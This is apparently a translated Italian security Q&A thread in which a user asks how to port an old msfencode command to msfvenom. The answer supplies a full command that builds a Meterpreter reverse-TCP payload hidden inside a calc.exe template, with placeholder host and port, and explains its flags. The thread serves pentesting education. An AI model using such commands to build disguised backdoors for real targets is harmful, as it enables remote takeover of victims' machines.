Esempio pratico di pentesting con msfvenom

1

Sto aggiornando un piccolo articolo che è obsoleto, ma non so molto sul pentesting.

Il framework è mfsvenom e il codice è:

msfencode -x calc.exe -t loop-vbs -o final.vbs

Prima era utilizzato msfencode e msfpayload , ma ora non è aggiornato. Ho provato:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=localhost LPORT=number -f vbs ...   

È solo perché alcuni utenti mi hanno chiesto di un articolo di pentesting se fosse possibile fare con msfvenom . Ma non so come aggiornarlo correttamente.

    
posta Sir Jack 18.04.2017 - 21:13
fonte

1 risposta

0

Nel frattempo in msfencode :

-x ha detto a msfencode che vuoi utilizzare calc.exe come modello;

-t è il formato di output;

-o file di output.

Per convertirlo in msfvenom non cambia molto:

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=localhost LPORT=number -x calc.exe -f loop-vbs -o final.exe

Notare che l'unica modifica [flag] nella prospettiva msfencode è da -t a -f .

Puoi eseguire msfvenom --list formats per conoscere il formato di output disponibile.

    
risposta data 10.08.2018 - 21:35
fonte

Leggi altre domande sui tag